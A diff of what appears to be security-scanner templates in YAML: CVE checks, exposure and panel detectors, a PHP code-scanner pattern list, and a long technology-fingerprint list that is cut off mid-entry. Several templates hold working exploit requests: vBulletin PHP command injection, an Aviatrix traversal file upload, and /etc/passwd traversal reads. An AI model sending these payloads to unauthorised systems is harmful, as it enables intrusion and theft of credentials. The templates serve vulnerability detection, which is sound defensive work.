a/vulnerabilities/other/simple-employee-rce.yaml +++ b/cves/2019/CVE-2019-20183.yaml @@ -1,11 +1,17 @@ -id: simple-employee-rce +id: CVE-2019-20183 info: - name: Simple Employee Records System 1.0 RCE + name: Simple Employee Records System 1.0 arbitrary file upload + description: Simple Employee Records System 1.0 contains an arbitrary file upload due to client-side validation of file extensions. This can be used to upload executable code to the server to obtain access or RCE. author: pikpikcu - severity: critical + severity: high reference: https://www.exploit-db.com/exploits/49596 - tags: rce,intrusive + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cwe-id: CWE-434 + cve-id: CVE-2019-20183 + tags: rce,intrusive,cve,upload,cve2019 requests: - raw: diff --git a/cves/2020/CVE-2020-17496.yaml b/cves/2020/CVE-2020-17496.yaml index d6a5b88323..ba6b5d66be 100644 --- a/cves/2020/CVE-2020-17496.yaml +++ b/cves/2020/CVE-2020-17496.yaml @@ -5,7 +5,7 @@ info: severity: critical reference: https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed description: | - vBulletin 5.5.4 through 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759. + vBulletin 5.5.4 through 5.6.2 allow remote command execution (RCE) via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759. tags: cve,cve2020,vbulletin,rce classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H @@ -17,6 +17,7 @@ requests: - raw: - | POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1 + Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;" @@ -29,4 +30,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/cves/2020/CVE-2020-29453.yaml b/cves/2020/CVE-2020-29453.yaml index 447eb86dbf..2ad29496d5 100644 --- a/cves/2020/CVE-2020-29453.yaml +++ b/cves/2020/CVE-2020-29453.yaml @@ -28,4 +28,4 @@ requests: - type: word words: - 'com.atlassian.jira' - part: body \ No newline at end of file + part: body diff --git a/cves/2021/CVE-2021-40870.yaml b/cves/2021/CVE-2021-40870.yaml new file mode 100644 index 0000000000..a7237d6d7c --- /dev/null +++ b/cves/2021/CVE-2021-40870.yaml @@ -0,0 +1,43 @@ +id: CVE-2021-40870 + +info: + name: Aviatrix Controller 6.x before 6.5-1804.1922. RCE + author: pikpikcu + severity: critical + description: Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal. + reference: + - https://wearetradecraft.com/advisories/tc-2021-0002/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-40870 + tags: cve,cve2021,rce,aviatrix + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-40870 + cwe-id: CWE-434 + +requests: + - raw: + - | + POST /v1/backend1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{{randstr}}.php&data=HACKERMAN + + - | + GET /v1/{{randstr}}.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'HACKERMAN' + - "PHP Extension" + - "PHP Version" + condition: and diff --git a/cves/2021/CVE-2021-40960.yaml b/cves/2021/CVE-2021-40960.yaml new file mode 100644 index 0000000000..126dd45651 --- /dev/null +++ b/cves/2021/CVE-2021-40960.yaml @@ -0,0 +1,27 @@ +id: CVE-2021-40960 + +info: + name: Galera WebTemplate 1.0 – Directory Traversal + author: daffainfo + severity: high + description: Galera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow. + reference: + - http://www.omrylmz.com/galera-webtemplate-1-0-directory-traversal-vulnerability-cve-2021-40960/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40960 + tags: cve,cve2021,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/cves/2021/CVE-2021-41381.yaml b/cves/2021/CVE-2021-41381.yaml new file mode 100644 index 0000000000..ff9081fb62 --- /dev/null +++ b/cves/2021/CVE-2021-41381.yaml @@ -0,0 +1,30 @@ +id: CVE-2021-41381 + +info: + name: Payara Micro Community 5.2021.6 Directory Traversal + author: pikpikcu + severity: medium + description: Payara Micro Community 5.2021.6 and below allows Directory Traversal + reference: + - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt + - https://nvd.nist.gov/vuln/detail/CVE-2021-41381 + tags: cve,cve2021,payara,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2021-41381 + cwe-id: CWE-22 + +requests: + - method: GET + path: + - "{{BaseURL}}/.//WEB-INF/classes/META-INF/microprofile-config.properties" + + matchers-condition: and + matchers: + - type: word + words: + - "payara.security.openid.default.providerURI=" + - "payara.security.openid.sessionScopedConfiguration=true" + condition: and + part: body diff --git a/exposed-panels/samba-swat-panel.yaml b/exposed-panels/samba-swat-panel.yaml new file mode 100644 index 0000000000..833afa73dc --- /dev/null +++ b/exposed-panels/samba-swat-panel.yaml @@ -0,0 +1,17 @@ +id: samba-swat-panel +info: + name: Samba SWAT panel + author: PR3R00T + severity: info + tags: panel + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + words: + - 'Basic realm="SWAT"' + part: header diff --git a/exposures/tokens/digitalocean/tugboat-config-exposure.yaml b/exposures/tokens/digitalocean/tugboat-config-exposure.yaml new file mode 100644 index 0000000000..50793f616a --- /dev/null +++ b/exposures/tokens/digitalocean/tugboat-config-exposure.yaml @@ -0,0 +1,33 @@ +id: tugboat-config-exposure + +info: + name: Tugboat configuration file exposure + description: Tugboat is a command line tool for interacting with your DigitalOcean droplets. + reference: https://github.com/petems/tugboat + author: geeknik + severity: critical + tags: tugboat,config,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/.tugboat" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "authentication" + - "access_token" + - "ssh_user" + condition: and + + extractors: + - type: regex + part: body + regex: + - 'access_token: .*' diff --git a/file/keys/amazon-sns-token.yaml b/file/keys/amazon-sns-token.yaml new file mode 100644 index 0000000000..96d12f5fbb --- /dev/null +++ b/file/keys/amazon-sns-token.yaml @@ -0,0 +1,17 @@ +id: amazon-sns-token + +info: + name: Amazon SNS Token Detect + author: TheBinitGhimire + severity: info + tags: file,token,amazon,aws + +file: + - extensions: + - all + + extractors: + - type: regex + name: amazon-sns-topic + regex: + - 'arn:aws:sns:[a-z0-9\-]+:[0-9]+:[A-Za-z0-9\-_]+' diff --git a/file/php/php-scanner.yaml b/file/php/php-scanner.yaml index f99892c6da..d802f82ce5 100644 --- a/file/php/php-scanner.yaml +++ b/file/php/php-scanner.yaml @@ -105,15 +105,21 @@ file: regex: - 'import_request_variables' - type: regex - # Avoid use of $GLOBALS + # Avoid use of GLOBALS regex: - - '\\$GLOBALS' + - 'GLOBALS' - type: regex regex: - - '\\$_GET' + - '_GET' - type: regex regex: - - '\\$_POST' + - '_POST' + - type: regex + regex: + - '_COOKIE' + - type: regex + regex: + - '_SESSION' - type: regex # Ensure the use of type checking validating against booleans (===) regex: @@ -206,7 +212,7 @@ file: - type: regex # MySQLi Extension regex: - - "mysqli((_real)?_connect)?" + - "mysqli((_real)?_connect)?|_query" - type: regex # Oracle OCI8 DBMS regex: @@ -243,3 +249,10 @@ file: # XML document regex: - "x(ptr|path)_new_context" + - type: regex + # Investigate if GetTableFields is called safely + regex: + - "GetTableFields" + - type: regex + regex: + - "ini_get.*magic_quotes_gpc.*" diff --git a/misconfiguration/put-method-enabled.yaml b/misconfiguration/put-method-enabled.yaml index b6ed7e48e9..7a136bdd94 100644 --- a/misconfiguration/put-method-enabled.yaml +++ b/misconfiguration/put-method-enabled.yaml @@ -5,18 +5,21 @@ info: author: xElkomy severity: high reference: https://portswigger.net/kb/issues/00100900_http-put-method-is-enabled + description: The PUT method is enabled on the web server, allowing for arbitrary file uploads. tags: injection requests: - raw: - | PUT /testing-put.txt HTTP/1.1 + Host: {{Hostname}} Content-Type: text/plain {{randstr}} - | GET /testing-put.txt HTTP/1.1 + Host: {{Hostname}} Content-Type: text/plain req-condition: true diff --git a/network/tidb-unauth.yaml b/network/tidb-unauth.yaml new file mode 100644 index 0000000000..ec0dc15c58 --- /dev/null +++ b/network/tidb-unauth.yaml @@ -0,0 +1,28 @@ +id: tidb-unauth + +info: + name: Unauth TiDB Disclosure + author: lu4nx + severity: high + metadata: + zoomeye-dork: tidb +port:"4000" + tags: network,tidb + +network: + - inputs: + - read: 1024 # skip handshake packet + - data: b200000185a6ff0900000001ff0000000000000000000000000000000000000000000000726f6f7400006d7973716c5f6e61746976655f70617373776f72640075045f70696406313337353030095f706c6174666f726d067838365f3634035f6f73054c696e75780c5f636c69656e745f6e616d65086c69626d7973716c076f735f757365720578787878780f5f636c69656e745f76657273696f6e06382e302e32360c70726f6772616d5f6e616d65056d7973716c # authentication + type: hex + + host: + - "{{Hostname}}" + - "{{Hostname}}:4000" + + read-size: 1024 + + matchers: + - type: binary + binary: + # resp format: + # 07: length, 02: sequence number, 00: success + - "0700000200000002000000" diff --git a/technologies/aviatrix-detect.yaml b/technologies/aviatrix-detect.yaml new file mode 100644 index 0000000000..a9640dd968 --- /dev/null +++ b/technologies/aviatrix-detect.yaml @@ -0,0 +1,24 @@ +id: aviatrix-detect + +info: + name: Aviatrix Detect + author: pikpikcu + severity: info + tags: tech,aviatrix + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Aviatrix Controller" + + - type: status + status: + - 200 diff --git a/technologies/csrfguard-detect.yaml b/technologies/csrfguard-detect.yaml new file mode 100644 index 0000000000..76e49b655e --- /dev/null +++ b/technologies/csrfguard-detect.yaml @@ -0,0 +1,71 @@ +id: csrf-guard-detect + +info: + name: OWASP CSRF Guard detection + author: forgedhallpass + severity: info + description: Detects OWASP CSRF Guard 3.x & 4.x versions and whether token-per-page support is enabled based on default configuration. + reference: https://github.com/OWASP/www-project-csrfguard + tags: tech,csrfguard + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + - | + GET /JavaScriptServlet HTTP/1.1 + Host: {{Hostname}} + Referer: {{BaseURL}} + + - | + POST /JavaScriptServlet HTTP/1.1 + Host: {{Hostname}} + OWASP-CSRFTOKEN: {{masterToken}} + + matchers-condition: or + matchers: + - type: word + name: "CSRFGuard-v3.x" + words: + - "FETCH-CSRF-TOKEN" + + - type: word + name: "CSRFGuard-v4.x" + words: + - "masterTokenValue" + + - type: dsl + name: "Disabled-token-per-page" + condition: and + dsl: + - 'status_code_3==400' + - 'contains(body, "Token-Per-Page functionality is disabled")' + + - type: dsl + name: "Enabled-token-per-page" + condition: and + dsl: + - 'status_code_3==200' + - 'contains(body, "{\"pageTokens")' + + cookie-reuse: true + extractors: + - type: regex + name: masterToken + internal: true + group: 1 + regex: + - "(?:masterTokenValue\\s*=\\s*')([^']+)';" + + - type: regex + group: 1 + name: "master-token" + regex: + - "(?:masterTokenValue\\s*=\\s*')([^']+)';" + + - type: json + name: "page-token" + json: + - '.pageTokens' \ No newline at end of file diff --git a/technologies/fatpipe-mpvpn-detect.yaml b/technologies/fatpipe-mpvpn-detect.yaml new file mode 100644 index 0000000000..f1d722039e --- /dev/null +++ b/technologies/fatpipe-mpvpn-detect.yaml @@ -0,0 +1,31 @@ +id: fatpipe-mpvpn-detect + +info: + name: FatPipe MPVPN Detect + author: princechaddha + severity: info + tags: tech,fatpipe + +requests: + - method: GET + path: + - "{{BaseURL}}/fpui/jsp/login.jsp" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "FatPipe MPVPN | Log in" + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '
([0-9.a-z]+)<\/h5>' diff --git a/technologies/fatpipe-warp-detect.yaml b/technologies/fatpipe-warp-detect.yaml new file mode 100644 index 0000000000..1659434b60 --- /dev/null +++ b/technologies/fatpipe-warp-detect.yaml @@ -0,0 +1,31 @@ +id: fatpipe-warp-detect + +info: + name: FatPipe WARP Detect + author: princechaddha + severity: info + tags: tech,fatpipe + +requests: + - method: GET + path: + - "{{BaseURL}}/fpui/jsp/login.jsp" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "FatPipe WARP | Log in" + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '
([0-9.a-z]+)<\/h5>' diff --git a/technologies/fingerprinthub-web-fingerprints.yaml b/technologies/fingerprinthub-web-fingerprints.yaml new file mode 100644 index 0000000000..e3d7f77b2b --- /dev/null +++ b/technologies/fingerprinthub-web-fingerprints.yaml @@ -0,0 +1,15125 @@ +id: fingerprinthub-web-fingerprints + +info: + name: FingerprintHub Technology Fingerprint + author: pdteam + reference: https://github.com/0x727/FingerprintHub + severity: info + tags: tech + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: or + matchers: + - type: word + name: 08cms + words: + - typeof(_08cms) + + - type: word + name: 1caitong + words: + - /custom/groupnewslist.aspx?groupid= + + - type: word + name: 21grid + words: + - 技术支持:网格(福建)智能科技有限公司 + + - type: word + name: 263-enterprise-mailbox + words: + - net263.wm.custom_login.homepage_init + + - type: word + name: 263-enterprise-mailbox + words: + - src="/custom_login/js/net263_wm_util.js + + - type: word + name: 263-hrm + words: + -

请使用263em登陆!

+ + - type: word + name: 263-meeting + words: + - + + - type: word + name: 315soft-filesystem + words: + - ">多可电子档案管理系统 + + - type: word + name: 360-tianqing + words: + - appid":"skylar6 + + - type: word + name: 360-tianqing + words: + - /task/index/detail?id={item.id} + + - type: word + name: 360-tianqing + words: + - 已过期或者未授权,购买请联系4008-136-360 + + - type: word + name: 360-webscan + words: + - webscan.360.cn/status/pai/hash + + - type: word + name: 365webcall + words: + - src='http://www.365webcall.com/imme1.aspx? + + - type: word + name: 365xxy-examing + words: + - href=https://unpkg.com/element-ui/lib/theme-chalk/index.css + + - type: word + name: 365xxy-examing + words: + - 云时政在线考试系统 + + - type: word + name: 3dcart + words: + - powered by 3dcart + + - type: word + part: header + name: 3dcart + words: + - "X-Powered-By: 3dcart" + + - type: word + name: 3kits-cms + words: + - 3kits + + - type: word + name: 3kits-cms + words: + - href="http://www.3kits.com" + + - type: word + condition: and + name: 42gears-suremdm + words: + - astrocontacts + - suremdm + + - type: word + condition: and + name: 53kf + words: + - chat.53kf.com/company.php + - chat.53kf.com/kf.php + + - type: word + name: 53kf + words: + - powered by 53kf + + - type: word + name: 53kf + words: + - tb.53kf.com/code/ + + - type: word + name: 54-customer-service + words: + - src="http://code.54kefu.net/ + + - type: word + name: 5ikq + words: + - content="我爱考勤云平台 + + - type: word + name: 5ikq + words: + - 我爱考勤云平台 + + - type: word + name: 5k-crm + words: + - /public/js/5kcrm.js + + - type: word + name: 5vtechnologies-blueangelsoftwaresuite + words: + - /cgi-bin/webctrl.cgi?action=index_page + + - type: word + name: 6kbbs + words: + - powered by 6kbbs + + - type: word + name: 6kbbs + words: + - generator" content="6kbbs + + - type: word + name: 74cms + words: + - content="74cms.com" + + - type: word + name: 74cms + words: + - content="74cms.com + + - type: word + name: 74cms + words: + - content="骑士cms + + - type: word + name: 74cms + words: + - powered by 78OA办公系统 + + - type: word + name: 78oa + words: + - /resource/javascript/system/runtime.min.js + + - type: word + name: 78oa + words: + - license.78oa.com + + - type: word + name: 7moor-product + words: + - class="ds_do_action domain_aboutus" + + - type: word + name: 7moor-product + words: + - /javascripts/qiniu/qiniu.js + + - type: word + part: header + name: a2b-webserver + words: + - "Server: a2b webserver" + + - type: word + name: aakuan-attendance-system + words: + - href="scripts/popmodal.css" + + - type: word + name: aakuan-attendance-system + words: + - aakuan.cn + + - type: word + name: aardvark-topsites + words: + - aardvark topsites + + - type: word + name: accellion-secure-file-transfer + words: + - secured by accellion + + - type: word + name: account-manager-exhibition-system + words: + - action="/system/login/login.shtml + + - type: word + name: achecker-web-accessibility-evaluation-tool + words: + - content="achecker is a web accessibility + + - type: word + name: acsoft-cloud + words: + - sdiyun.com, all rights reserved + + - type: word + name: acsoft-cloud + words: + - onrememberpasswordclick + + - type: word + condition: and + name: acsoft-reimbursement-system + words: + -
location.href="ucenter"; + + - type: word + name: activecollab + words: + - powered by activecollab + + - type: word + name: activecollab + words: + -

+ - Acunetix + + - type: word + name: adaptec-maxview + words: + - action="/maxview/manager/login.xhtml + + - type: word + name: adimoney + words: + - <img src="/img/logo.png" alt="adimoney"/> + + - type: word + name: adimoney + words: + - 'content="adimoney.com mobile advertisement network. ' + + - type: word + name: adiscon-loganalyzer + words: + - adiscon gmbh + + - type: word + name: adminer + words: + - https://www.adminer.org + + - type: word + name: adobe-coldfusion + words: + - /cfajax/ + + - type: word + name: adobe-coldfusion + words: + - <cfscript> + + - type: word + name: adobe-connect + words: + - /common/scripts/showcontent.js + + - type: word + name: adobe-cq5 + words: + - _jcr_content + + - type: word + name: adobe-experience-manager + words: + - adobe experience manager + + - type: word + name: adobe-experience-manager + words: + - ' class="coral-heading coral-heading--1"' + + - type: word + name: adobe-flex + words: + - adobe flex + + - type: word + name: adobe-flex + words: + - learn more about flex at http://flex.org + + - type: word + name: adobe-golive + words: + - generator" content="adobe golive + + - type: word + name: adobe-magento + words: + - /skin/frontend/ + + - type: word + name: adobe-magento + words: + - blank_img + + - type: word + name: adobe-robohelp + words: + - generator" content="adobe robohelp + + - type: word + name: adt-iam + words: + - content="tpn,vpn,内网安全,内网控制,主机防护" + + - type: word + name: advanced-electron-forum + words: + - powered by aef + + - type: word + name: advantech-webaccess + words: + - /bw_templete1.dwt + + - type: word + name: advantech-webaccess + words: + - /broadweb/webaccessclientsetup.exe + + - type: word + name: advantech-webaccess + words: + - /broadweb/bwuconfig.asp + + - type: word + name: advantech_wise + words: + - remote manage your intelligent systems + + - type: word + name: adviserlogiccli + words: + - navigator.serviceworker.register('/adviserlogiccache.js') + + - type: word + name: afterlogic-webmail + words: + - afterlogic webmail pro + + - type: word + name: agilebpm + words: + - class="logo-element">agile-bpm + + - type: word + name: agilebpm + words: + - class="logo-element">bpm + + - type: word + condition: and + name: agoracgi + words: + - /agora.cgi?product= + - /store/agora.cgi + + - type: word + name: ahnlab-trusguard-ssl-vpn + words: + - trusguard ssl vpn client + + - type: word + name: aidex + words: + - http://www.aidex.de/ + + - type: word + name: aisino-telecom + words: + - <font class="bottomfont">航天信息股份有限公司 电信行业版 + + - type: word + condition: and + name: ajenti-server-admin-panel + words: + - action="/ajenti:auth" + - src="/ajenti:static/ + + - type: word + name: akiva-webboard + words: + - powered by webboard + + - type: word + name: alcasar + words: + - valoriserdiv5 + + - type: word + name: alcatel_lucent-omnivista-cirrus + words: + - /help/en-us/others/ov-cirrus_cookiepolicy.html + + - type: word + name: ali-monitoring-system + words: + - /monitor/css/monitor.css + + - type: word + name: ali-monitoring-system + words: + - href="/monitor/monitoritem/monitoritemlist.htm + + - type: word + name: alibaba-group-dms + words: + - copyright © dms all rights reserved (alibaba 数据管理产品) + + - type: word + name: alibaba-group-tlog + words: + - content="tlog 实时数据处理 + + - type: word + name: aliyun-rds + words: + - class="legend">rds管理系统</div> + + - type: word + name: aliyuncdn + words: + - cdn.aliyuncs.com + + - type: word + part: header + name: aliyunoss + words: + - "Server: aliyunoss" + + - type: word + name: alliance-web-platform + words: + - window.location = "/swp/group/admin"; + + - type: word + name: alstom-system + words: + - href="technology_communion.asp + + - type: word + name: am-websystem + words: + - id="dvlogo" + + - type: word + name: amaze-ui + words: + - amazeui.min.js + + - type: word + name: amaze-ui + words: + - amazeui.js + + - type: word + name: amaze-ui + words: + - amazeui.css + + - type: word + name: ambuf-onlineexam + words: + - 北京众恒志信科技 + + - type: word + name: ami-megarac-sp + words: + - <modelname>ami megarac sp</modelname> + + - type: word + name: ami-megarac-spx + words: + - <modelname>ami megarac spx</modelname> + + - type: word + name: anecms + words: + - content="erwin aligam - ealigam@gmail.com + + - type: word + name: animati-pacs + words: + - <form action="" onsubmit="pacs.login.sendpasswordrecoverymail() + + - type: word + name: anmai-system + words: + - ' id="lblname">版权所有:上海安脉计算机科技有限公司' + + - type: word + name: anmai-system + words: + - id="lblname1">版权所有:上海安脉计算机科技有限公司 + + - type: word + name: anmai-system + words: + - <font color="#000000">上海安脉计算机科技有限公司</font> + + - type: word + name: anneca-intouch-crm + words: + - href="http://www.anneca.cz" + + - type: word + name: anta-asg + words: + - setcookie("asglanguage",document.form1.planguage.value) + + - type: word + name: aolansoft-studentsystem + words: + - vcode.aspx + + - type: word + name: apabi-digital-resource-platform + words: + - default/apabi.css + + - type: word + name: apabi-digital-resource-platform + words: + - <link href="http://apabi + + - type: word + name: apache-activemq + words: + - <title>Apache ActiveMQ + + - type: word + name: apache-airflow + words: + - Airflow + + - type: word + name: apache-airflow + words: + - src="/static/pin_100.png" + + - type: word + name: apache-airflow + words: + - airflow + + - type: word + condition: and + name: apache-ambari + words: + - '"/licenses/NOTICE.txt"' + - Ambari + + - type: word + name: apache-archiva + words: + - /archiva.js + + - type: word + name: apache-archiva + words: + - /archiva.css + + - type: word + name: apache-axis + words: + - http://ws.apache.org/axis2 + + - type: word + condition: and + name: apache-axis2 + words: + - axis2-admin + - axis2-web + + - type: word + part: header + name: apache-cocoon + + - type: word + name: apache-druid + words: + - content="Apache Druid console" + + - type: word + name: apache-flink + words: + - Apache Flink Web Dashboard + + - type: word + name: apache-flink + words: + - apache flink dashboardthe apache haus + + - type: word + name: apache-kylin + words: + - + + - type: word + name: apache-kylin + words: + - href="/kylin/" + + - type: word + name: apache-mesos + words: + - apache mesos + + - type: word + name: apache-nifi + words: + - /nifi + + - type: word + name: apache-ofbiz + words: + - Powered by OFBiz + + - type: word + name: apache-oozie-web-console + words: + - oozie-console + + - type: word + name: apache-oozie-web-console + words: + - href="/oozie">oozie console + + - type: word + part: header + name: apache-shiro + words: + - "Set-Cookie: rememberMe=deleteMe" + + - type: word + name: apache-shiro + words: + - shiro + + - type: word + name: apache-skywalking + words: + - sorry but SkyWalking doesn't work + + - type: word + part: header + name: apache-solr + words: + - "Location: /solr/" + + - type: word + name: apache-struts + words: + - content="Struts2 Showcase for Apache Struts Project" + + - type: word + name: apache-tomcat + words: + -

Apache Tomcat/ + + - type: word + name: apache-tomcat + words: + - Apache Tomcat/ + + - type: word + condition: and + name: apache-tomcat + words: + - /manager/html + - /manager/status + + - type: word + name: apache-tomcat + words: + - href="tomcat.css + + - type: word + name: apache-tomcat + words: + - this is the default tomcat home page + + - type: word + name: apache-tomcat + words: + - <h3>apache tomcat + + - type: word + name: apache-unomi + words: + - logo apache unomi + + - type: word + name: apache-wicket + words: + - xmlns:wicket= + + - type: word + name: apache-wicket + words: + - /org.apache.wicket. + + - type: word + name: apc-management + words: + - this object on the apc management web server is protected + + - type: word + name: apereo-cas + words: + - cas – central authentication service + + - type: word + name: apex-livebpm + words: + - href="/plug-in/login/fixed/css/login.css" + + - type: word + part: header + name: apilayer-caddy + words: + - "Server: caddy" + + - type: word + name: appcms + words: + - powerd by appcms + + - type: word + name: appex-lotapp + words: + - appex network corporation + + - type: word + name: appex-lotapp + words: + - /change_lan.php?lanid=en + + - type: word + name: apphp-calendar + words: + - this script was generated by apphp calendar + + - type: word + name: appserv + words: + - appserv/softicon.gif + + - type: word + name: appserv + words: + - index.php?appservlang=th + + - type: word + name: apusic + words: + - <td>管理apusic应用服务器</td> + + - type: word + part: header + name: apusic + words: + - "Server: apusic application server" + + - type: word + name: arab-portal + words: + - "powered by: arab" + + - type: word + name: argosoft-mail-server + words: + - argosoft mail server plus for + + - type: word + name: array-vpn + words: + - an_util.js + + - type: word + name: articlepublisherpro + words: + - www.articlepublisherpro.com + + - type: word + name: articlepublisherpro + words: + - content="article publisher pro + + - type: word + part: header + name: arvancloud + words: + - "Server: arvancloud" + + - type: word + name: asp168-oho + words: + - upload/moban/images/style.css + + - type: word + name: asp168-oho + words: + - default.php?mod=article&do=detail&tid + + - type: word + name: aspcms + words: + - content="aspcms + + - type: word + name: aspcms + words: + - /inc/aspcms_advjs.asp + + - type: word + name: aspentech-aspen-infoplus21 + words: + - src="/aspencui/css/appstyles.js + + - type: word + name: aspnet-mvc + words: + - <h2>modify this template to jump-start your asp.net mvc application.</h2> + + - type: word + name: aspnet-mvc + words: + - asp.net mvc application</p> + + - type: word + name: aspnet-requestvalidationmode + words: + - httprequestvalidationexception + + - type: word + name: aspnet-requestvalidationmode + words: + - request validation has detected a potentially dangerous client input value + + - type: word + name: asproxy + words: + - surf the web invisibly using asproxy power + + - type: word + name: asproxy + words: + - btnasproxydisplaybutton + + - type: word + name: astaro-command-center + words: + - /js/_variables_from_backend.js? + + - type: word + name: astaro-command-center + words: + - commandcenter + + - type: word + name: asterisk + words: + - asterisk_rawmanpath + + - type: word + name: asus-aicloud + words: + - href="/smb/css/startup.png" + + - type: word + name: atfuture-system + words: + - /content/web/theme/skin01/img/p_login_logo01.png + + - type: word + name: atmail + words: + - powered by atmail + + - type: word + name: atmail + words: + - /index.php/mail/auth/processlogin + + - type: word + name: atmail + words: + - <input id="mailserverinput + + - type: word + name: atutor-elearning + words: + - content="atutor + + - type: word + part: header + name: atutor-elearning + words: + - "Set-Cookie: atutorid" + + - type: word + name: aurion + words: + - <!-- aurion teal will be used as the login-time default + + - type: word + name: aurion + words: + - /aurion.js + + - type: word + name: authine-h3-bpm + words: + - h3 bpm suite信息化的最佳实践 + + - type: word + name: autoindex-php-script + words: + - title="autoindex default + + - type: word + part: header + name: autoindex-php-script + words: + - "Set-Cookie: autoindex2" + + - type: word + name: autoindex-php-script + words: + - autoindex.sourceforge.net/ + + - type: word + name: automatedlogiccorporation-webctrl + words: + - href="/_common/lvl5/about/eula.jsp" + + - type: word + name: autoset + words: + - .logo-autoset + + - type: word + name: auxilium-petratepro + words: + - index.php?cmd=11 + + - type: word + name: av-arcade + words: + - powered by <a href="http://www.avscripts.net/avarcade/ + + - type: word + name: avantfax + words: + - src="images/avantfax-big.png" border="0" alt="avantfax + + - type: word + name: avantfax-ictfax + words: + - <img src="images/avantfax-big.png" border="0" alt="ictfax + + - type: word + name: avantfax-ictfax + words: + - content="ictfax + + - type: word + name: avaya-application-enablement-services + words: + - <b>application enablement services </b> + + - type: word + name: avaya-application-enablement-services + words: + - avaya + + - type: word + name: avaya-aura-utility-server + words: + - vmstitle">avaya aura™ utility server + + - type: word + name: avaya-aura-utility-server + words: + - /webhelp/base/utility_toc.htm + + - type: word + name: avaya-aura-utility-server + words: + - avaya aura® utility services + + - type: word + name: avaya-aura-utility-server + words: + - avaya inc. all rights reserved + + - type: word + name: avaya-communication-manager + words: + - var newlocation = "https://" + target + "/cgi-bin/common/issue"; + + - type: word + name: avaya-system-platform + words: + - content="0;url=vsplogin.action + + - type: word + name: avtech-video-web-server + words: + - /av732e/setup.exe + + - type: word + name: aws-ec2 + words: + - welcome to nginx on amazon ec2! + + - type: word + name: aws-elastic-beanstalk + words: + - <h2>what's next?</h2> + + - type: word + name: aws-elastic-beanstalk + words: + - aws.amazon.com/elasticbeanstalk + + - type: word + name: axcms + words: + - content="axcms.net + + - type: word + name: axcms + words: + - generated by axcms.net + + - type: word + name: axentra-hipserv + words: + - content="axentra + + - type: word + name: axgate-sslvpn + words: + - class="axgate" + + - type: word + name: axis2-web + words: + - axis2-web/css/axis-style.css + + - type: word + part: header + name: axtls-embad-httpd + words: + - "Server: axhttpd" + + - type: word + name: b2evolution + words: + - /powered-by-b2evolution-150t.gif + + - type: word + name: b2evolution + words: + - powered by b2evolution + + - type: word + name: b2evolution + words: + - content="b2evolution + + - type: word + name: backbee + words: + - <div id="bb5-site-wrapper"> + + - type: word + name: bad-debt-management-system + words: + - 登录密码错误次数超过5次,帐号被锁定。请联系省坏账系统管理员,或发邮件解锁 + + - type: word + name: baidu-subaidu + words: + - id="yunjiasu_link + + - type: word + name: baishijia-cms + words: + - /resource/images/cms.ico + + - type: word + name: bamboocloud-bim + words: + - bim 开发配置与运维控制台 + + - type: word + name: bangyong-pm2 + words: + - pm2项目管理系统bs版增强工具.zip + + - type: word + name: barracuda-ssl-vpn + words: + - barracuda ssl vpn + + - type: word + name: basic-php-events-lister + words: + - 'powered by: <a href="http://www.mevin.com/">' + + - type: word + name: bbpress + words: + - <!-- if you like showing off the fact that your server rocks --> + + - type: word + name: bbpress + words: + - is proudly powered by <a href="http://bbpress.org + + - type: word + name: bees_cms + words: + - powerd by + + - type: word + condition: and + name: bees_cms + words: + - beescms + - template/default/images/slides.min.jquery.js + + - type: word + name: bees_cms + words: + - /default/images/xslider.js + + - type: word + name: bees_cms + words: + - /default/images/search_btn.gif + + - type: word + name: bees_cms + words: + - powerd by beescms + + - type: word + name: bees_cms + words: + - mx_form/mx_form.php + + - type: word + name: beichuang-book-retrieval-system + words: + - opac_two + + - type: word + name: 